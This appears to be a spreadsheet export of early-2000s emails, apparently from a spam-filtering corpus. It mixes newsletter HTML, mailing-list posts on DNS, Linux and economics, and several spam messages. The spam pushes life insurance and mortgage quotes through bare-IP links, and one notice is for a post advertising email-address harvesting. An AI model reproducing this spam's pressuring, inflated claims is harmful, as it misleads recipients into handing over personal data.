 ckthru.online.com/Click?q=3De7-2y-GQmVce3pzCGTVqS8CMB0qvsZR" &gt;advancing tec=
 hniques&lt;/a&gt; once used haphazardly by record companies and Napster-haters, i=
 n ways that may be far more destructive to the credibility of file-swapping=
  networks than were previous efforts...Apple &lt;a href=3D"http://clickthru.on=
 line.com/Click?q=3Dfc-WpHmQVwTaudE4Aca9-0t3VVat9dR" &gt;released&lt;/a&gt; the final=
  version of its QuickTime 6 digital media software, marking a stand-down in=
  a dispute over licensing fees...The Federal Trade Commission is &lt;a href=3D=
 "http://clickthru.online.com/Click?q=3D11-l8riI2-aPLcop-3X3VynhNBuCqcR" &gt;pl=
 anning&lt;/a&gt; to take a deeper look at whether some state laws illegally restr=
 ict Internet commerce...In one of the toughest sentences for online auction=
  fraud, a Virginia man was &lt;a href=3D"http://clickthru.online.com/Click?q=
 =3D26-KqPVIiMxelrEsJeBBBkqU8niQ7RR" &gt;sentenced&lt;/a&gt; to 12 years in prison fo=
 r defrauding hundreds of shoppers on eBay and Yahoo auction sites...The Hou=
 se of Representatives overwhelmingly approved a bill that would allow for &lt;=
 a href=3D"http://clickthru.online.com/Click?q=3D3c-tK4RIcIw_GtL-2JY0VXXjhrH=
 NHdR" &gt;life prison sentences&lt;/a&gt; for malicious computer hackers...MPEG LA, =
 a group of patent holders governing MPEG-4, &lt;a href=3D"http://clickthru.onl=
 ine.com/Click?q=3D51-QgUWIjJWhghTxK5Jlh9GpMUHM3rR" &gt;finalized licensing ter=
 ms&lt;/a&gt; for the media delivery standard, bowing to market pressure for manag=
 eable royalty rates...Several tech and telecommunications giants are &lt;a hre=
 f=3D"http://clickthru.online.com/Click?q=3D66-kDH_IyWzTRfhSOLsPj9y-DzbW-iR"=
  &gt;considering a joint venture&lt;/a&gt; to pepper the United States with wireless=
  "hot spots."
 &lt;p&gt;
 &lt;i&gt;Want more? Check out all this week's &lt;a href=3D"http://clickthru.online.=
 com/Click?q=3D7b-prT_IBZzgRSgmUpbDr4q1O7VpJlR" &gt;News.com headlines&lt;/a&gt;.&lt;/i&gt;
         &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
         &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### footer ### --&gt;
 &lt;table width=3D"612" bgcolor=3D"#000000" cellpadding=3D"0" cellspacing=3D"0=
 " border=3D"0"&gt;
 &lt;tr&gt;&lt;td width=3D"1"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" heig=
 ht=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"10" bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://www.cnet.com/b.gif"=
  width=3D"10" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"1"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" height=
 =3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"599" bgcolor=3D"#cccccc"&gt;&lt;img src=3D"http://www.cnet.com/b.gif=
 " width=3D"1" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"1"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" height=
 =3D"1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=3D"612" bgcolor=3D"#eeeeee" cellpadding=3D"0" cellspacing=3D"0=
 " border=3D"0"&gt;
 &lt;tr&gt;&lt;td width=3D"1" bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.g=
 if" width=3D"1" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"10" bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://www.cnet.com/b.gif"=
  width=3D"10" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"1" bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" =
 width=3D"1" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"12"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"12" height=
 =3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"575"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" height=
 =3D"10"&gt;&lt;br&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D90-wHZMQ_IMRhBVirJVb8HYULu=
 onX9R" &gt;
 &lt;img src=3D"http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width=3D"375" height=3D"=
 18" border=3D"0" alt=3D"Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;=
 br&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face=3D"ms sans serif, geneva" size=3D"-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-cnet-newsletter=
 s@example.com&lt;br&gt;
 &lt;A NOTRACK HREF=3D'http://clickthru.online.com/Click?q=3Da5-DyfHrzZqSQXorbx=
 hdMk61qDcw2kf4dRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href=3D'http://nl.com.com=
 /servlet/url_login?email=3Dqqqqqqqqqq-cnet-newsletters@example.com&amp;brand=3Dc=
 net'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href=3D"http://clickthru.on=
 line.com/Click?q=3Dba-m-45QXpJTWkrcYwxhOmI_uIUEksR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a=
  href=3D"http://clickthru.online.com/Click?q=3Dcf-ebM-QLw1uwmMdU_JaylIO7r3f=
 xZR" &gt;Advertise&lt;/A&gt;&lt;p&gt;Please send any questions, comments, or concerns to&amp;n=
 bsp;&lt;a href=3D"mailto:dispatchfeedback@news.com"&gt;dispatchfeedback@news.com&lt;=
 /A&gt;.&lt;br&gt;&lt;/font&gt;
 &lt;!-- /subscription management--&gt;
 &lt;/font&gt;&lt;img src=3D"http://www.zdnet.com/b.gif" width=3D"1" height=3D"8"&gt;&lt;/t=
 d&gt;
 &lt;td width=3D"12"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"12" height=
 =3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"1" bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" =
 width=3D"1" height=3D"1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=3D"612" bgcolor=3D"#000000" cellpadding=3D"0" cellspacing=3D"0=
 " border=3D"0"&gt;
 &lt;tr&gt;&lt;td width=3D"1"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" heig=
 ht=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"10" bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://www.cnet.com/b.gif"=
  width=3D"10" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"601"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" height=
 =3D"1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=3D"612" bgcolor=3D"#ffcc00" cellpadding=3D"0" cellspacing=3D"0=
 " border=3D"0"&gt;
 &lt;tr&gt;&lt;td width=3D"1" bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.g=
 if" width=3D"1" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"10"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"10" height=
 =3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"37"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3De5-9Z7OQg=
 yslCOTgwGjnbcumX6cvbuR" &gt;&lt;img src=3D"http://www.cnet.com/i/dp/smrb.gif" wid=
 th=3D"37" height=3D"37" border=3D"0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D"563" nowrap&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dfa-FmqNQhO1bO6LU5PtvDA4oSM=
 poLsR" &gt;&lt;font color=3D"#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D0f-RM2lIqjD91rKD7csUb9HGRJ=
 1bfZR" &gt;&lt;font color=3D"#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D24-8DdMIczi7pJ6R5fgeUef92i=
 qrwdR" &gt;&lt;font color=3D"#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D39-7QgMIjIiVp_1FThCGLs-y39=
 w-_cR" &gt;&lt;font color=3D"#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D4e-0Y95InZ3aFtmiVkIKlsTn8N=
 _JjiR" &gt;&lt;font color=3D"#000000"&gt;All CNET services&lt;/font&gt;&lt;/a&gt;
 &lt;/font&gt;&lt;/td&gt;
 &lt;td width=3D"1" bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" =
 width=3D"1" height=3D"1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=3D"612" cellpadding=3D"0" cellspacing=3D"0" border=3D"0"&gt;
 &lt;tr&gt;&lt;td bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D=
 "1" height=3D"1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td height=3D"25"&gt;&lt;font face=3D"ms sans serif, geneva" size=3D"-2"&gt;&lt;tab=
 le width=3D100% border=3D0 cellspacing=3D2 cellpadding=3D1&gt; &lt;tr valign=3Dbo=
 ttom&gt; &lt;td width=3D75% height=3D31&gt; &lt;p&gt;&lt;/font&gt; &lt;br&gt;&lt;b&gt;&lt;font face=3DArial, He=
 lvetica, sans-serif size=3D2&gt;    Copyright 2002 CNET Networks, Inc. All rig=
 hts reserved.    &lt;/font&gt;&lt;/b&gt; &lt;/p&gt;&lt;/td&gt;&lt;td height=3D31 valign=3Dtop&gt; &lt;div al=
 ign=3Dright&gt; &lt;img src=3D"http://gserv-cnet.zdnet.com/clear/outbound.gif?APP=
 ID=3D2&amp;EMID=3D25136487&amp;NL=3De433&amp;ISSUE=3D2002-07-20" height=3D1 width=3D1&gt; =
    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=3D2&gt;&lt;font face=3DArial, Helvetica, san=
 s-serif size=3D2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=3D1 WIDTH=3D1 SRC=3D"http://clickthru.online.com/Click?q=3D64-U=
 BDhncLhcuhJIfc7SQcQsa8RL9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: IIU post from emailharvest@email.com requires approval
</t>
  </si>
  <si>
    <t xml:space="preserve">As list administrator, your authorization is requested for the
 following mailing list posting:
     List:    IIU@iiu.taint.org
     From:    emailharvest@email.com
     Subject: Harvest lots of E-mail addresses quickly !
     Reason:  Post by non-member to a members-only list
 At your convenience, visit:
     http://iiu.taint.org/mailman/admindb/iiu
 to approve or deny the request.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Reflections from GDC Europe: It's A Complex (Game) World
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613663,159/
 Date: 2002-10-06T18:12:57+01:00
 In our final round-up from the GDC Europe 2002, we review the confernece 
 sessions and the ECTS expo, noting the spiraling increase in game complexity.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: $500,000 Life Policy $9.50 per month. vyw
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;font size="2" PTSIZE="10"&gt;
 &lt;table height="338" cellSpacing="0" cellPadding="0" width="539" border="0" style="border:12px double #000000; border-collapse:collapse; padding-left:4; padding-right:4; padding-top:1; padding-bottom:1" bordercolor="#111111" bordercolorlight="#FFFFFF" bordercolordark="#FFFFFF"&gt;
   &lt;tr&gt;
     &lt;td width="4" height="423" bgcolor="#99CC00"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td vAlign="top" align="left" width="535" height="423" style="border-style: solid; border-width: 0" bgcolor="#99CC00"&gt;
     &lt;table cellSpacing="0" cellPadding="4" width="95%" border="0" bgcolor="#FFFFFF" style="border-collapse: collapse" bordercolor="#111111"&gt;
       &lt;tr&gt;
         &lt;td vAlign="top" align="right" height="424" bgcolor="#99CC00"&gt;
         &lt;table cellSpacing="0" cellPadding="0" width="100%" border="0"&gt;
           &lt;tr&gt;
             &lt;td&gt;
             &lt;div align="left"&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#000000" size="2"&gt;
               &lt;br&gt;
               &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;b&gt;
 &lt;font PTSIZE="10" face="Verdana" style="font-size: 10.5pt"&gt;
 You can't predict the future, but you can always prepare for it.&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
             &lt;div align="left"&gt;
 &amp;nbsp;&lt;/div&gt;
             &lt;div align="center"&gt;
               &lt;b&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#FF0000" style="font-size: 16.5pt"&gt;
               DOUBLE &lt;/font&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#FFFFFF" style="font-size: 16.5pt"&gt;
               Your Life Insurance Policy For&lt;/font&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#FF0000" style="font-size: 16.5pt"&gt; 
               NO EXTRA COST!&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
             &lt;div align="center"&gt;
               &amp;nbsp;&lt;/div&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td&gt;
             &lt;div align="left"&gt;
               &lt;font face="Verdana" size="2" PTSIZE="10"&gt;Compare rates from top insurance companies around the country&lt;br&gt;
 In our life and times, it's important to plan for your family's future, while 
 being comfortable financially. Choose the right Life Insurance policy today.&lt;/font&gt;&lt;/div&gt;
             &lt;div align="left"&gt;
               &lt;font face="Verdana" size="2" PTSIZE="10"&gt;&amp;nbsp;&lt;/font&gt;&lt;/div&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table cellSpacing="0" cellPadding="0" width="504" border="0" style="position: relative; border-collapse: collapse" bordercolor="#111111" height="1"&gt;
           &lt;tr&gt;
             &lt;td vAlign="top" width="325" height="1" bgcolor="#FFFFFF"&gt;
             &lt;div align="center"&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#838285"&gt;&lt;b&gt;
               &lt;br&gt;
               &lt;/a&gt;
               &lt;/b&gt;&lt;/font&gt;&lt;b&gt;&lt;font face="Verdana" size="2"&gt;&lt;font PTSIZE="10"&gt;You'll be able to compare rates and get a&lt;/font&gt;&lt;font color="#838285" PTSIZE="10"&gt;
               &lt;/font&gt;&lt;font PTSIZE="10" color="#FF0000"&gt;Free Application&lt;/font&gt;&lt;font color="#838285" PTSIZE="10"&gt;
               &lt;/font&gt;&lt;font PTSIZE="10"&gt;in less than a 
 minute!&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
             &lt;p align="center"&gt;&lt;b&gt;
 &lt;font PTSIZE="10" face="Verdana" color="#FF0000"&gt;
 COMPARE YOUR COVERAGE
 &lt;/font&gt;
             &lt;/b&gt;&lt;/p&gt;
             &lt;dl&gt;
               &lt;dd&gt;
 &lt;font size="5" PTSIZE="10" face="Verdana"&gt;
               &lt;b&gt;$250,000&lt;/b&gt;&lt;/font&gt;&lt;font size="2" PTSIZE="10" face="Verdana" color="#838285"&gt;&lt;br&gt;
               as low as
 &lt;/font&gt;
               &lt;b&gt;
 &lt;font PTSIZE="10" face="Verdana"&gt;
               &lt;font size="5" color="#FF0000"&gt;$6.50&lt;/font&gt;&lt;font color="#838285"&gt;
               &lt;/font&gt;per month&lt;/font&gt;&lt;/b&gt;&lt;/dd&gt;
               &lt;dt&gt;&amp;nbsp;&lt;/dt&gt;
               &lt;dd&gt;
 &lt;font size="2" PTSIZE="10"&gt;
 &lt;font size="5" PTSIZE="10" face="Verdana"&gt;
               &lt;b&gt;$500,000&lt;/b&gt;&lt;/font&gt;&lt;font size="2" PTSIZE="10" face="Verdana" color="#838285"&gt;&lt;br&gt;
               as low as
 &lt;/font&gt;
 &lt;/font&gt;
               &lt;b&gt;
 &lt;font PTSIZE="10" face="Verdana"&gt;
 &lt;font size="5" PTSIZE="10" color="#FF0000"&gt;
               $9.50&lt;/font&gt;&lt;font size="2" PTSIZE="10" color="#838285"&gt;
 &lt;/font&gt;
 &lt;font size="2" PTSIZE="10"&gt;
               per month&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/dd&gt;
               &lt;dt&gt;&amp;nbsp;&lt;/dt&gt;
               &lt;dd&gt;
 &lt;font size="2" PTSIZE="10"&gt;
 &lt;font size="5" PTSIZE="10" face="Verdana"&gt;
               &lt;b&gt;$1,000,000&lt;/b&gt;&lt;/font&gt;&lt;font size="2" PTSIZE="10" face="Verdana" color="#838285"&gt;&lt;br&gt;
               as low as
 &lt;/font&gt;
 &lt;/font&gt;
               &lt;b&gt;
 &lt;font PTSIZE="10" face="Verdana"&gt;
 &lt;font size="5" PTSIZE="10" color="#FF0000"&gt;
               $15.50&lt;/font&gt;&lt;font size="2" PTSIZE="10" color="#838285"&gt;
 &lt;/font&gt;
 &lt;font size="2" PTSIZE="10"&gt;
               per month&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/dd&gt;
               &lt;dt&gt;&amp;nbsp;&lt;/dt&gt;
               &lt;div align="left"&gt;
                 &lt;ul&gt;
                   &lt;li&gt;
                   &lt;dt&gt;
 &lt;font PTSIZE="10"&gt;
                   &lt;b&gt;&lt;font face="Verdana" size="2"&gt;Get your&lt;/font&gt;&lt;font color="#838285" face="Verdana" size="2"&gt;
                   &lt;/font&gt;&lt;font face="Verdana" size="2" color="#FF0000"&gt;FREE&lt;/font&gt;&lt;font color="#838285" face="Verdana" size="2"&gt;
                   &lt;/font&gt;&lt;font face="Verdana" size="2"&gt;instant quotes... &lt;/font&gt;
                   &lt;/b&gt;
 &lt;/font&gt;
                   &lt;/dt&gt;
                   &lt;/li&gt;
                   &lt;li&gt;
                   &lt;dt&gt;
 &lt;font PTSIZE="10"&gt;
                   &lt;b&gt;&lt;font face="Verdana" size="2"&gt;Compare the lowest prices, then...
                   &lt;/font&gt;&lt;/b&gt;
 &lt;/font&gt;
                   &lt;/dt&gt;
                   &lt;/li&gt;
                   &lt;li&gt;
                   &lt;dt&gt;
 &lt;font PTSIZE="10"&gt;
                   &lt;b&gt;&lt;font face="Verdana" size="2"&gt;Select a company and Apply Online.
                   &lt;/font&gt;&lt;/b&gt;
 &lt;/font&gt;
                   &lt;/dt&gt;
                   &lt;/li&gt;
                 &lt;/ul&gt;
               &lt;/div&gt;
             &lt;/dl&gt;
             &lt;div align="center"&gt;
               &lt;b&gt;
               &lt;a title="http://66.231.133.63/index.html?ID=A12b" target="new_win" href="http://66.231.133.68/quote/index.html?ID=I512c"&gt;
               &lt;font color="#FF0000" size="2" PTSIZE="10" face="Verdana"&gt;DON'T 
               MISS THIS!! GET YOUR FREE INSTANT QUOTE &lt;/font&gt;
               &lt;font color="#FF0000" face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;
               CLICK FOR YOUR FREE QUOTE, NOW!&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;
             &lt;div align="center"&gt;
               &amp;nbsp;&lt;/div&gt;
             &lt;div align="center"&gt;
 &lt;font size="2" PTSIZE="10"&gt;
               &lt;b&gt;
 &lt;font size="2" PTSIZE="10" face="Verdana" color="#838285"&gt;
 (Smoker rates also available)&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
             &lt;/td&gt;
             &lt;td vAlign="top" width="4" height="1"&gt;
             &lt;div align="right"&gt;
               &amp;nbsp;&lt;/div&gt;
             &lt;/td&gt;
             &lt;td width="175" height="1" bgcolor="#99CC00" bordercolor="#006600" align="center"&gt;
             &lt;dl&gt;
               &lt;p align="left"&gt;&lt;b&gt;
               &lt;font face="Verdana" style="font-size: 16pt" color="#FFFFFF"&gt;Make&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 
               Insurance Companies Compete For Your Insurance.&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
               &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
             &lt;/dl&gt;
             &lt;p align="left"&gt;&lt;b&gt;
             &lt;font face="Verdana" style="font-size: 16pt" color="#FFFFFF"&gt;We Have 
             Eliminated The Long Process Of Finding The Best Rate By Giving You 
             Access To Multiple Insurance Companies All At Once.&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table cellSpacing="0" cellPadding="3" width="505" border="0"&gt;
           &lt;tr&gt;
             &lt;td colSpan="2" height="64" bgcolor="#000000" width="499"&gt;
             &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
             &lt;table cellSpacing="2" cellPadding="0" width="482" border="0" height="38"&gt;
               &lt;tr&gt;
                 &lt;td width="327" height="36" style="border-style: solid; border-width: 0"&gt;
                 &lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2" color="#FFFFFF"&gt;Apply 
                 now and one of our Insurance Brokers will get back to you within 
                 48 hours.&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141" bgcolor="#FF0000" height="36" style="border-left-style: solid; border-left-width: 1"&gt;
                 &lt;p align="center"&gt;&lt;b&gt;&lt;font color="#FFFFFF" size="4"&gt;
                 &lt;a style="text-decoration: none" href="http://66.231.133.68/quote/index.html?ID=I512c"&gt;
                 &lt;font color="#FFFFFF"&gt;CLICK HERE!&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;/td&gt;
       &lt;/tr&gt;
     &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;If You wish to be removed from future mailings please &amp;quot;&lt;a href="http://66.231.133.68/final/index_remoov.html?ID=1512"&gt;Clicking 
 Here&lt;/a&gt;&amp;quot; . &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &amp;nbsp;&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [IIU] IE nameserver problems
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 Four of the IE nameservers are publishing out of date DNS information.
 The four listed below are publishing the IE zone from last Friday.
 They are six days behind reality.
  192.16.202.11    NS.EU.NET.
  192.93.0.4       NS2.NIC.FR.
  198.133.199.102  GNS1.DOMAINREGISTRY.IE.
  198.133.199.103  GNS2.DOMAINREGISTRY.IE.
 The upshot of this is that correct DNS resolution for IE DNS data that
 has been added or updated since last Friday is going to be 
 intermittant. If you're lucky your resolver will query one of the five
 nameservers that are publishing an up-to-date zone. Unfortunately, five
 out of nine aren't good odds.
 Don't forget, if you lose the gamble your resolver is going to cache
 the bad data for up to two days.
 If you're a user of BIND 8 or BIND 9 you could add
 	blackhole {
 		192.16.202.11;
 		192.93.0.4;
 		198.133.199.102;
 		198.133.199.103;
 	};
 to your named.conf and restart BIND to avoid query the bad nameservers.
 This will prevent _any_ queries to those servers.
 Putting
 	16.1.0.18
 	204.123.2.18
 	16.1.0.19
 	192.111.39.100
 	212.17.32.2
 	193.1.142.2
 in /service/dnscache/root/servers/ie and restarting dnscache will
 have the same result for dnscache users.
 ATB,
 james
 _______________________________________________
 Irish Internet Users mailing list
 Irish Internet Users@iiu.taint.org
 http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Mortgage Rates Are Down.                    ptjti
</t>
  </si>
  <si>
    <t xml:space="preserve">You can save thousands of dollars over the course of your loan with just a .25% drop in your rate! 
 "Now is the time to take advantage of falling interest rates!  There is no advantage in waiting any longer."
 http://quotes.readyserve21.com/sure_quote/
 Refinance or consolidate high interest credit card debt into a low interest mortgage.  Mortgage interest is tax deductible, whereas credit card interest is not.
 Our nationwide network of lenders have hundreds of  different loan programs to fit your current situation:
    *  Refinance
    *  Second Mortgage
    *  Debt Consolidation
    *  Home Improvement
    *  Purchase
 By clicking on the link below and filling out the form, the information you provide is instantly transmitted to our network of financial experts who will respond to your request with up to three offers.
 This service is 100% free to homeowners, and of course, without obligation.
 http://quotes.readyserve21.com/sure_quote/
 Click here to delete your address from future updates.
 http://quotes.readyserve21.com/sure_quote/rm/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: no matter where you go
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; Another thing to note about Australia is that, while the highest income
 &gt; tax bracket (47%) isn't *that* high, it kicks in at around USD33,000.
 and it looks like PPP for USD 33k is only
 about USD 50k*, at least in Big Macs:
 &lt;http://www.economist.com/images/20020427/CFN751.gif&gt;
 Australia	 A$3.00 USD 1.62	-35%
 US		  $2.49 USD 2.49
 Switzerland	SFr6.30 USD 3.81	+53%
 Interestingly enough, although housing in
 Perth seems cheap, housing in Switzerland
 doesn't seem to be as expensive as the Big
 Macs would imply.
 -Dave
 * which still doesn't sound bad, if one
 can convert urban CA equity into free and
 clear Oz ownership.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] ILUG newsgroup(s)?
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Is there any way that the mailing list can be 
 &gt; turned into newsgroup?
 &gt; 
 &gt; Newsgroups are great for threading of discussions,
 &gt; working offline and I feel that they work
 &gt; much better for this sort of technical discussion
 &gt; than a mailing list.
 I suppose its all down to personal preference, but I disagree strongly.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Gary Lawrence Murphy writes:
 &gt; 20,000 years ago, one of them the size of Mt Everest just ever so
 &gt; slightly grazed us and left a scar 400km long in the side of South
 &gt; America before it scooted out into space.  First nations people would
 &gt; have been there then, and it would have seriously ruined their day.
 Do you have any further information about this incident that
 would me find more details on the web?
 - Gordon
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: request ?
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Once upon a time, Antoine wrote :
 &gt; 
 &gt; &gt; Hi, I wanted to know if I could post a request for rpm on the list, or if
 &gt; &gt; I had to contact Mathias directly ?
 &gt; &gt; Thanks...
 &gt; 
 &gt; Well, since you posted, you could have asked just in case while you were at
 &gt; it ;-) I don't often fulfill requests, so don't expect any miracles :-/
 ...true...
 Well, I have so many requests that I can't decide which ones I go first... let's
 say: drip, bastille, avidemux and motion.
 I'm not asking... just proposing to you...
 Thanks.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [IRR] Re: The 3rd Annual Consult Hyperion Digital Identity Forum
</t>
  </si>
  <si>
    <t xml:space="preserve">On 4/10/02 1:13 am, someone e-said:
 &gt; The guy messed up his own URL. It should be
 &gt; http://www.digitalidforum.com which redirects to
 &gt; http://www.consult.hyperion.co.uk/digid3.html
 I didn't mess it up: I f*cked it up by not paying attention to a
 copy-and-paste from something else.
 Next time, I really will leave it to the PR guys.
 Best regards,
 Dave Birch.
 _______________________________________________
 Irregulars mailing list
 Irregulars@tb.tf
 http://tb.tf/mailman/listinfo/irregulars
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Quickly
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.aaronsw.com/weblog/000619
 Date: 2002-09-30T00:33:14-06:00
 Anyone have a copy of Bell Centennial I can borrow? I wonder if I'll ever have 
 $100 to spend on fonts. (Matthew Carter, I'd be happy to pay you the two cents 
 in royalties you probably get for selling $100 worth of fonts.) 
 *Update:* Kevin Marks[1], who is stupendously incredible for far more things 
 than I can list here points out that Gill Sans (which I was asking for earlier) 
 is _included with OS X_. I knew Mac OS X included a lot of great fonts[2], but 
 I don't know how I overlooked this. _Awesome!_ 
 Tufte notes: Terrie Miller[3]. 
 First ammendement beer bash. 
 iSync Beta[4] (guess they learned a lesson from iCal) is out.
 [1] http://epeus.blogspot.com
 [2] http://www.apple.com/macosx/features/font.html
 [3] http://www.oreillynet.com/~terrie/tufte/
 [4] http://www.apple.com/isync/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Computational Recreations
</t>
  </si>
  <si>
    <t xml:space="preserve">On Monday, August 26, 2002, at 09:59  AM, Tom wrote:
